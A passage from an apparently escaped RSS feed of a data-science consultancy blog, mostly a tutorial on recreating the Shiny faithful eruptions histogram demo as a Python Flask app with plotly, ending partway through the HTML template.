&lt;li&gt;Alternatively, we could use the &lt;code&gt;ccache&lt;/code&gt; trick, where we store compiled files to be used for the next build. This requires a little more work, but this has already been done by &lt;a href="https://pat-s.me/post/using-ccache-to-speed-up-r-package-checks-on-travis-ci/" rel="external"&gt;Patrick Schratz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Parallel builds using the &lt;code&gt;Ncpus&lt;/code&gt; argument with &lt;code&gt;install.packages()&lt;/code&gt; typically doesn’t typically work for most CI systems, as the (free) VM will only have a single core.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating a Shiny App with Flask</title><link>https://www.jumpingrivers.com/blog/r-shiny-python-flask/</link><pubDate>Tue, 21 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-python-flask/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-flask/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-python-flask/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So &lt;a href="https://blog.rstudio.com/2020/04/02/rstudio-connect-1-8-2/" rel="external"&gt;RStudio Connect&lt;/a&gt; has embraced Python and now runs &lt;a href="https://flask.palletsprojects.com/en/1.1.x/" rel="external"&gt;Flask&lt;/a&gt; applications! At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we make a lot of use of R, shiny, and Python for creating visual tools for our clients. Shiny has a lot of nice features, in particular it is very fast for prototyping web applications. Over our morning meeting we discussed the fact that flask will soon be coming to RStudio products and wondered how easy it would be to recreate one of the simple shiny examples as a flask application. As I suggested it, I got the job of playing about with flask for an hour to recreate the faithful eruptions histogram shiny demo - the finished resulted is hosted on our &lt;a href="https://jr-demo.jmpr.io/hello-flask/" rel="external"&gt;Connect&lt;/a&gt; server. For this post it is not required that you know shiny, but I will make reference to it in various places.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-shiny-python-flask"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="spoiler"&gt;Spoiler&lt;/h2&gt;
&lt;p&gt;Shiny and flask are different tools with different strengths. If you have a simple shiny application, shiny is by far the quicker tool to get the job done and requires less knowledge about web based technologies. However, flask gives us much greater flexibility than could easily be achieved in shiny.&lt;/p&gt;
&lt;p&gt;I’m hoping that this will turn into a series of blog posts about flask for data science applications.&lt;/p&gt;
&lt;p&gt;With that in mind, lets treat this as an exercise in creating a simple flask application for visualisation of some data with a little interactivity. For reference, the shiny application I am referring to can be viewed alongside the &lt;a href="https://shiny.rstudio.com/tutorial/written-tutorial/lesson1/" rel="external"&gt;tutorial&lt;/a&gt; on how to build it.&lt;/p&gt;
&lt;img class="image-center" src="2020-hello-flask-full.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="what-is-flask"&gt;What is Flask?&lt;/h2&gt;
&lt;p&gt;Flask is a micro web framework written in Python with a wealth of extensions for things like authentication, form validation, ORMs. It provides the tools to build web based applications. Whilst it is very light, combined with the extensions it is very powerful. Meaning that your web application might be a simple API to a machine learning model that you have created, or a full web application. Pinterest and LinkedIn use flask for example.&lt;/p&gt;
&lt;h2 id="set-up-your-app"&gt;Set up your app&lt;/h2&gt;
&lt;p&gt;Create a directory structure in which to house your project, we can quickly create a project root and other necessary directories. We will explain the utility of each of the directories shortly.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p app_example/&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;static,templates,data&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd app_example
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I highly recommend for all Python projects to set up a virtual environment. There are a number of tools for managing virtual environments in Python, but I tend to use &lt;code&gt;virtualenv&lt;/code&gt;. We can create a new virtual environment for this project in the current directory and activate it.&lt;/p&gt;
&lt;p&gt;In 2020 it should also go without saying that we are using Python 3 for this activity, specifically 3.7.3.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="other-directories"&gt;Other directories&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;data:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For our project, we will also want somewhere to house the data. Since we are talking about a very small tabular dataset of 2 variables and 272 cases, any sort of database would be overkill. So we will just read from a csv on disk. We can create this data set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr::write_csv(faithful, &amp;#39;data/faithful.csv&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;templates:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The visual elements of the flask application will be web pages rendered from html templates. The name &lt;code&gt;templates&lt;/code&gt; is chosen specifically here as it is the default directory that your flask app will look for when trying to render web pages.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;static:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This will be our place to store any static assets, like CSS style sheets and JavaScript code.&lt;/p&gt;
&lt;h3 id="packages"&gt;Packages&lt;/h3&gt;
&lt;p&gt;For this project we will need some python packages&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;{flask} (obviously)&lt;/li&gt;
&lt;li&gt;{pandas} - useful for data manipulation, but in this case just used to read data from disk&lt;/li&gt;
&lt;li&gt;{numpy} - we will use for calculating the histogram bins and frequencies&lt;/li&gt;
&lt;li&gt;{plotly} - my preferred graphics library in Python at the moment and well suited to web based applications&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install flask pandas plotly numpy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="choosing-your-editor"&gt;Choosing your editor&lt;/h2&gt;
&lt;p&gt;My editor of choice for anything that is not R related is VScode, which I find particularly suitable for applications that are created using a mixture of different languages. There are lots of plugins for Python, HTML, CSS and JavaScript for the purposes of code completion, snippets, linting and terminal execution which means I can write, test and run all the parts of my application from the comfort of one place.&lt;/p&gt;
&lt;h2 id="hello-flask"&gt;Hello Flask&lt;/h2&gt;
&lt;p&gt;With everything set up we can start upon our Flask application. One of the things that I really like about flask is the simple syntax for adding URL endpoints to our site. We can create a “hello world” style example with the following python code (saved in this case in &lt;code&gt;app.py&lt;/code&gt;)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# required imports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# instantiate the application object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create an endpoint with a decorator&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hello&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello World&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Back in the terminal we could run this app with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and view at the default URL of &lt;code&gt;localhost:5000&lt;/code&gt;. I think the interesting part of the above code snippet is the route decorator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Routes refer to the URL patterns of our web application. The &lt;code&gt;&amp;quot;/&amp;quot;&lt;/code&gt; is effectively the root route. i.e what you would see at a web address like “mycoolpage.com”. The decorator here allows us to specify a Python function that should run when a user navigates to a particular URL within our domain name (or a handler).&lt;/p&gt;
&lt;h2 id="what-our-app-needs"&gt;What our app needs&lt;/h2&gt;
&lt;p&gt;We are creating an application here that allows users to choose an input via a slider, which causes a histogram to redraw. For this, our app will need two routes&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A route for generating the histograms&lt;/li&gt;
&lt;li&gt;A html page that the user will see&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="creating-a-histogram"&gt;Creating a histogram&lt;/h3&gt;
&lt;p&gt;We could write a function which will draw a histogram using {plotly} fairly easily.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# imports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; read_csv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# read data from disk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;faithful &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/faithful.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the bins&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful[&lt;span style="color:#a5d6ff"&gt;&amp;#39;waiting&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts, bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(x, bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;min(x), np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max(x), bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; (bins[:&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bins[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;bar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;bins, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; template&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;simple_white&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; p
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is the sort of thing we might create outside of the web application context for visualising this data. If you want to see the plot you might do something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; hist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;show()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However we want to make some modifications for use in our web application.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;We want to turn our work into a flask application. We can start by adding the required imports and structure to our &lt;code&gt;app.py&lt;/code&gt; with the &lt;code&gt;hist&lt;/code&gt; function in it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# other imports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# instantiate app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# At the end of our script&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We want to take the number of bins from a request to our webserver. We could achieve this by, instead of taking the number of bins from the argument to our function, taking it from the argument in the request from the client. When a Flask application handles a request object, it creates a Request object which can be accessed via the &lt;code&gt;request&lt;/code&gt; proxy. Arguments can then be obtained from this context&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; request
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; int(request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;args[&lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We want the function to be available at a route. The request context only really makes sense within a request from a client. Since the client is going to ask our application for the histogram to be updated dependent on their input we decorate our function with a route decorator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Return JSON to send to the client. Instead of returning a figure object, we return some JSON that we can process with JavaScript on the client side&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.utils&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; PlotlyJSONEncoder
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dumps(p, cls&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;PlotlyJSONEncoder)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you were to rerun your Flask server now and navigate your browser to &lt;code&gt;localhost:5000/graph?bins=30&lt;/code&gt; you would see the fruit of your labour. Although not a very tasty fruit at the moment, as all you will see is all of the JSON output for your graph. So let’s put the user interface together.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="creating-the-user-interface"&gt;Creating the user interface&lt;/h3&gt;
&lt;p&gt;We will want to grab a few front end dependencies. For brevity they are included here by linking to the CDN. The shiny app we are mimicking uses bootstrap for it’s styling, which we will use too. Similarly the &lt;code&gt;sliderInput()&lt;/code&gt; function in {shiny} uses the {ion-rangslider} JS package, so we will too. We will take the Plotly js library (for which the plotly python package is a wrapper). We will not need to know how to create these plots in JavaScript, but will use it to take the plot returned from our flask server and render it client side in the browser.&lt;/p&gt;
&lt;p&gt;The head of our HTML file in &lt;code&gt;templates/index.html&lt;/code&gt; then looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- index.html --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;head&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;meta&lt;/span&gt; charset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;UTF-8&amp;#34;&lt;/span&gt;&amp;gt;
